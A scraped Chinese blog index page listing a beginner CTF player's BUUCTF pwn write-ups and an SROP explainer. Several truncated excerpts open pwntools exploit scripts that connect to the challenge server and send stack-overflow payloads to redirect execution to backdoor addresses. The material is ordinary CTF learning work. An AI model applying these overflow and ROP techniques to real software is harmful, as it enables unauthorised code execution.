自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

预览 取消 提交

自定义博客皮肤

-+
上一步保存

o琦野o的博客

qwq一只菜鸡ctfer

  • 博客(8)
  • 收藏
  • 关注
排序:
按最后发布时间
按访问量
RSS订阅

原创 BUUCTF pwn水题大赏(七)(更新中)

BUUCTF pwn水题大赏wustctf2020_getshellwustctf2020_getshell简单 32 位栈溢出。exp:from pwn import*context.log_level = 'DEBUG'p=remote('node3.buuoj.cn',28411)#p=process('./wustctf2020_getshell')backdoor = 0x0804851Bpayload = 'a'*0x18+'a'*4+p32(backdoor)p.sen

2021-04-02 17:36:24 205 1

原创 BUUCTF pwn水题大赏(六)

BUUCTF pwn水题大赏suctf_2018_stacksuctf_2018_stack最最最最最最基本的栈溢出,也不知道为啥会这么高分。exp:from pwn import*context.log_level = 'DEBUG'p=remote('node3.buuoj.cn',28582)#p=process('./SUCTF_2018_stack')elf=ELF('./SUCTF_2018_stack')payload = 'a'*0x28+p64(0x0040067A)

2021-03-11 20:45:47 388 1

原创 SROP

SROPSignal机制Signal机制漏洞Signal机制利用SROP成立的条件常用系统调用调用号64位32位Signal机制SROP 的全称是 Sigreturn Oriented Programming 。sigreturn是一个系统调用。 ​ ​当内核向某个进程发起一个 signal ,该进程会被暂时挂起,进入内核。内核会帮用户进程将其上下文保存在该进程的栈上,然后在栈顶填上一个地址 rt_sigreturn ,这个地址指向一段代码,在这段代码中会调用sigreturn系统调用

2021-02-03 18:30:20 890

原创 BUUCTF pwn水题大赏(五)

BUUCTF pwn水题大赏41.ciscn_2019_s_341.ciscn_2019_s_3srop ,要注意 rsp 指向的位置。exp:from pwn import*context.log_level = 'DEBUG'context.arch = 'amd64'p = remote('node3.buuoj.cn',29369)#p = process('./ciscn_s_3')elf = ELF('./ciscn_s_3')syscall_ret = 0x400517

2021-02-03 18:27:54 332 1

原创 BUUCTF pwn水题大赏(四)

BUUCTF pwn水题大赏31.[BJDCTF2nd]ydsneedgirlfriend232.babyheap_0ctf_201733.ciscn_2019_ne_534.[HarekazeCTF2019]baby_rop235.jarvisoj_fm36.pwn2_sctf_201637.jarvisoj_tell_me_something38.picoctf_2018_rop chain39.cmcc_simplerop40.[ZJCTF 2019]Login31.[BJDCTF2nd]ydsne

2021-02-03 18:26:36 414

原创 BUUCTF pwn水题大赏(三)

BUUCTF pwn水题大赏21.铁人三项(第五赛区)_2018_rop22.bjdctf_2020_babyrop23.[BJDCTF 2nd]r2t424.[BJDCTF 2nd]test25.bjdctf_2020_babystack226.bjdctf_2020_babyrop227.bjdctf_2020_router28.others_babystack29.ciscn_2019_s_430.wdb2018_guess21.铁人三项(第五赛区)_2018_rop32位栈溢出,利用 write

2021-02-03 18:25:14 427

原创 BUUCTF pwn水题大赏(二)

BUUCTF pwn水题大赏11.get_started_3dsctf_201612.ciscn_2019_en_213.ciscn_2019_n_814.jarvisoj_level215.not_the_same_3dsctf_201616.[BJDCTF 2nd]one_gadget17.bjdctf_2020_babystack18.[HarekazeCTF2019]baby_rop19.jarvisoj_level2_x6420.ciscn_2019_n_511.get_started_3dsc

2021-02-03 18:23:43 224

原创 BUUCTF pwn水题大赏(一)

BUUCTF pwn水题大赏1.test_your_nc2.rip3.warmup_csaw_20164.pwn1_sctf_20165.ciscn_2019_n_16.jarvisoj_level07.ciscn_2019_c_18.[OGeek2019]babyrop9.[第五空间2019 决赛]PWN510.[BJDCTF 2nd]r2t311.get_started_3dsctf_201612.ciscn_2019_en_213.ciscn_2019_n_814.jarvisoj_level215.

2021-02-03 15:52:54 345

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除